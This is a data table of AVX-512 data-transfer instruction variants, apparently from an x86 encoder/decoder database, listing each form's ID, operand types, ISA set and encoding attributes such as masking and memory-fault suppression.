3902 VPMOVZXWQ VPMOVZXWQ_YMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3937 VPMOVUSQW VPMOVUSQW_XMMu16_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3938 VPMOVUSQW VPMOVUSQW_MEMu16_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3939 VPMOVUSQW VPMOVUSQW_XMMu16_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3940 VPMOVUSQW VPMOVUSQW_MEMu16_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3941 VPMOVUSQW VPMOVUSQW_XMMu16_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
3942 VPMOVUSQW VPMOVUSQW_MEMu16_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3962 VPMOVUSQB VPMOVUSQB_XMMu8_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3963 VPMOVUSQB VPMOVUSQB_MEMu8_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3964 VPMOVUSQB VPMOVUSQB_XMMu8_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3965 VPMOVUSQB VPMOVUSQB_MEMu8_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3966 VPMOVUSQB VPMOVUSQB_XMMu8_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
3967 VPMOVUSQB VPMOVUSQB_MEMu8_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3968 VPMOVUSQD VPMOVUSQD_YMMu32_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3969 VPMOVUSQD VPMOVUSQD_MEMu32_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3970 VPMOVUSQD VPMOVUSQD_XMMu32_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3971 VPMOVUSQD VPMOVUSQD_MEMu32_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3972 VPMOVUSQD VPMOVUSQD_XMMu32_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
3973 VPMOVUSQD VPMOVUSQD_MEMu32_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3980 VPMOVSXDQ VPMOVSXDQ_ZMMi64_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3981 VPMOVSXDQ VPMOVSXDQ_ZMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3982 VPMOVSXDQ VPMOVSXDQ_XMMi64_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3983 VPMOVSXDQ VPMOVSXDQ_XMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3984 VPMOVSXDQ VPMOVSXDQ_YMMi64_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
3985 VPMOVSXDQ VPMOVSXDQ_YMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4027 VMOVDDUP VMOVDDUP_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4028 VMOVDDUP VMOVDDUP_ZMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_MOVDDUP MASKOP_EVEX
4029 VMOVDDUP VMOVDDUP_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4030 VMOVDDUP VMOVDDUP_XMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_MOVDDUP MASKOP_EVEX
4031 VMOVDDUP VMOVDDUP_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4032 VMOVDDUP VMOVDDUP_YMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_MOVDDUP MASKOP_EVEX
4045 VMOVDQU32 VMOVDQU32_ZMMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4046 VMOVDQU32 VMOVDQU32_ZMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4047 VMOVDQU32 VMOVDQU32_ZMMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4048 VMOVDQU32 VMOVDQU32_MEMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4049 VMOVDQU32 VMOVDQU32_XMMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4050 VMOVDQU32 VMOVDQU32_XMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4051 VMOVDQU32 VMOVDQU32_XMMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4052 VMOVDQU32 VMOVDQU32_MEMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4053 VMOVDQU32 VMOVDQU32_YMMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4054 VMOVDQU32 VMOVDQU32_YMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4055 VMOVDQU32 VMOVDQU32_YMMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4056 VMOVDQU32 VMOVDQU32_MEMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4242 VPMOVD2M VPMOVD2M_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512DQ_128 ATTRIBUTES:
4243 VPMOVD2M VPMOVD2M_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512DQ_256 ATTRIBUTES:
4244 VPMOVD2M VPMOVD2M_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512DQ_512 ATTRIBUTES:
4260 VPMOVSXBQ VPMOVSXBQ_ZMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4261 VPMOVSXBQ VPMOVSXBQ_ZMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4262 VPMOVSXBQ VPMOVSXBQ_XMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4263 VPMOVSXBQ VPMOVSXBQ_XMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4264 VPMOVSXBQ VPMOVSXBQ_YMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4265 VPMOVSXBQ VPMOVSXBQ_YMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4284 VPMOVZXBD VPMOVZXBD_ZMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4285 VPMOVZXBD VPMOVZXBD_ZMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4286 VPMOVZXBD VPMOVZXBD_XMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4287 VPMOVZXBD VPMOVZXBD_XMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4288 VPMOVZXBD VPMOVZXBD_YMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4289 VPMOVZXBD VPMOVZXBD_YMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4314 VPMOVB2M VPMOVB2M_MASKmskw_XMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES:
4315 VPMOVB2M VPMOVB2M_MASKmskw_YMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES:
4316 VPMOVB2M VPMOVB2M_MASKmskw_ZMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES:
4356 VMOVSLDUP VMOVSLDUP_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4357 VMOVSLDUP VMOVSLDUP_ZMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX
4358 VMOVSLDUP VMOVSLDUP_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4359 VMOVSLDUP VMOVSLDUP_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX
4360 VMOVSLDUP VMOVSLDUP_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4361 VMOVSLDUP VMOVSLDUP_YMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX
4375 VPMOVSXBW VPMOVSXBW_XMMi16_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX
4376 VPMOVSXBW VPMOVSXBW_XMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4377 VPMOVSXBW VPMOVSXBW_YMMi16_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX
4378 VPMOVSXBW VPMOVSXBW_YMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4379 VPMOVSXBW VPMOVSXBW_ZMMi16_MASKmskw_YMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX
4380 VPMOVSXBW VPMOVSXBW_ZMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4422 VPMOVZXBQ VPMOVZXBQ_ZMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4423 VPMOVZXBQ VPMOVZXBQ_ZMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4424 VPMOVZXBQ VPMOVZXBQ_XMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4425 VPMOVZXBQ VPMOVZXBQ_XMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4426 VPMOVZXBQ VPMOVZXBQ_YMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4427 VPMOVZXBQ VPMOVZXBQ_YMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4494 VPMOVW2M VPMOVW2M_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES:
4495 VPMOVW2M VPMOVW2M_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES:
4496 VPMOVW2M VPMOVW2M_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES:
4539 VPMOVM2W VPMOVM2W_XMMu16_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES:
4540 VPMOVM2W VPMOVM2W_YMMu16_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES:
4541 VPMOVM2W VPMOVM2W_ZMMu16_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES:
4560 VPMOVM2B VPMOVM2B_XMMu8_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES:
4561 VPMOVM2B VPMOVM2B_YMMu8_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES:
4562 VPMOVM2B VPMOVM2B_ZMMu8_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES:
4577 VPMOVM2D VPMOVM2D_XMMu32_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_128 ATTRIBUTES:
4578 VPMOVM2D VPMOVM2D_YMMu32_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_256 ATTRIBUTES:
4579 VPMOVM2D VPMOVM2D_ZMMu32_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_512 ATTRIBUTES:
4605 VMOVLHPS VMOVLHPS_XMMf32_XMMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES:
4671 VPMOVZXBW VPMOVZXBW_XMMi16_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX
4672 VPMOVZXBW VPMOVZXBW_XMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4673 VPMOVZXBW VPMOVZXBW_YMMi16_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX
4674 VPMOVZXBW VPMOVZXBW_YMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4675 VPMOVZXBW VPMOVZXBW_ZMMi16_MASKmskw_YMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX
4676 VPMOVZXBW VPMOVZXBW_ZMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4696 VPMOVSQW VPMOVSQW_XMMi16_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4697 VPMOVSQW VPMOVSQW_MEMi16_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4698 VPMOVSQW VPMOVSQW_XMMi16_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4699 VPMOVSQW VPMOVSQW_MEMi16_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4700 VPMOVSQW VPMOVSQW_XMMi16_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4701 VPMOVSQW VPMOVSQW_MEMi16_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4717 VPMOVSQD VPMOVSQD_YMMi32_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4718 VPMOVSQD VPMOVSQD_MEMi32_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4719 VPMOVSQD VPMOVSQD_XMMi32_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4720 VPMOVSQD VPMOVSQD_MEMi32_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4721 VPMOVSQD VPMOVSQD_XMMi32_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4722 VPMOVSQD VPMOVSQD_MEMi32_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4723 VPMOVSQB VPMOVSQB_XMMi8_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4724 VPMOVSQB VPMOVSQB_MEMi8_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4725 VPMOVSQB VPMOVSQB_XMMi8_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4726 VPMOVSQB VPMOVSQB_MEMi8_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4727 VPMOVSQB VPMOVSQB_XMMi8_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4728 VPMOVSQB VPMOVSQB_MEMi8_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4735 VPMOVWB VPMOVWB_XMMu8_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX
4736 VPMOVWB VPMOVWB_MEMu8_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4737 VPMOVWB VPMOVWB_XMMu8_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX
4738 VPMOVWB VPMOVWB_MEMu8_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4739 VPMOVWB VPMOVWB_YMMu8_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX
4740 VPMOVWB VPMOVWB_MEMu8_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4862 VMOVDQU8 VMOVDQU8_XMMu8_MASKmskw_XMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX
4863 VMOVDQU8 VMOVDQU8_XMMu8_MASKmskw_MEMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4864 VMOVDQU8 VMOVDQU8_XMMu8_MASKmskw_XMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX
4865 VMOVDQU8 VMOVDQU8_MEMu8_MASKmskw_XMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4866 VMOVDQU8 VMOVDQU8_YMMu8_MASKmskw_YMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX
4867 VMOVDQU8 VMOVDQU8_YMMu8_MASKmskw_MEMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4868 VMOVDQU8 VMOVDQU8_YMMu8_MASKmskw_YMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX
4869 VMOVDQU8 VMOVDQU8_MEMu8_MASKmskw_YMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4870 VMOVDQU8 VMOVDQU8_ZMMu8_MASKmskw_ZMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX
4871 VMOVDQU8 VMOVDQU8_ZMMu8_MASKmskw_MEMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4872 VMOVDQU8 VMOVDQU8_ZMMu8_MASKmskw_ZMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX
4873 VMOVDQU8 VMOVDQU8_MEMu8_MASKmskw_ZMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4878 VPMOVUSDB VPMOVUSDB_XMMu8_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4879 VPMOVUSDB VPMOVUSDB_MEMu8_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4880 VPMOVUSDB VPMOVUSDB_XMMu8_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4881 VPMOVUSDB VPMOVUSDB_MEMu8_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4882 VPMOVUSDB VPMOVUSDB_XMMu8_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4883 VPMOVUSDB VPMOVUSDB_MEMu8_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4908 VPMOVUSDW VPMOVUSDW_YMMu16_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4909 VPMOVUSDW VPMOVUSDW_MEMu16_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4910 VPMOVUSDW VPMOVUSDW_XMMu16_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4911 VPMOVUSDW VPMOVUSDW_MEMu16_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4912 VPMOVUSDW VPMOVUSDW_XMMu16_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4913 VPMOVUSDW VPMOVUSDW_MEMu16_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5292 VPMOVQ2M VPMOVQ2M_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512DQ_128 ATTRIBUTES:
5293 VPMOVQ2M VPMOVQ2M_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512DQ_256 ATTRIBUTES:
5294 VPMOVQ2M VPMOVQ2M_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512DQ_512 ATTRIBUTES:
5515 VMOVDQU16 VMOVDQU16_XMMu16_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX
